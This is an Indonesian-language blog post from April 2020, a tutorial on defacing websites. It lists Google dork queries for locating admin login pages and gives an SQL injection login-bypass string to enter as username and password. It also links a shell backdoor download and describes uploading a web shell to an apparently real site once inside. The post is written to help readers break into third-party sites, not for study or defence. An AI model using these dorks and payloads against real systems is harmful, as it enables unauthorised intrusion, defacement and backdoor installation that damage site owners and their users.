Friday, April 10, 2020
Jdi guys di blog kali ini saya #Sky_ID ingin memberikan tutorial ato cara deface poc bypass sql login
Oke kita lgsg ke bahan bahannya, bahan-bahannya adalah:
-Dork
kalo dork kalian bisa memakai dork ini:
inurl:/adminpanel/ "login"
inurl:/super_admin/ "login"
inurl:/backend/ "login"
inurl:/admin/ "username"
inurl:/panel/ "admin login"
inurl:/paneladmin/ "login"
inurl:/superadmin/ "login"
inurl:/login.php "admin"
inurl:/admin_login.php
inurl:/adminlogin.php
inurl:/loginadmin.php
Selebihnya kalian kembangin menggunakan otak heker kalian
-Susu
-Udud
-Internet
-Browser
-Shell Backdoor/Mini Shell
Bisa kalian download dsni Touch Me!
-Script Deface
Untuk username dan passwordnya kalian bisa gunain ini
Username: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+
Klo kalian dh isi itu, klo msk dashboard brarti web nya vuln
Oke sy dsni uda nyiapin target,jdi langsung saja
Nah kalian isi username dan passwordnya seperti ini, klo sudah kalian klik LOGIN
Klo vuln kalian akan msk dashboard
Selanjutnya kalian mau apa aja,seterah kalian, mau kalian up shell(kalo support webnya) jso, dan lain sebagainya
Jadi dsni saya akan up shell saja
Tutor up shell? Use your brain:v.
And boom, dsni sy sudah up shell, dan kalian klo dh up shell, strah mau kalian apain
Oke guys sekian dr saya #Sky_ID
Terima kasih telah mengunjungi Blog saya
Sekian dr saya
Wassalamualaikum Wr. Wb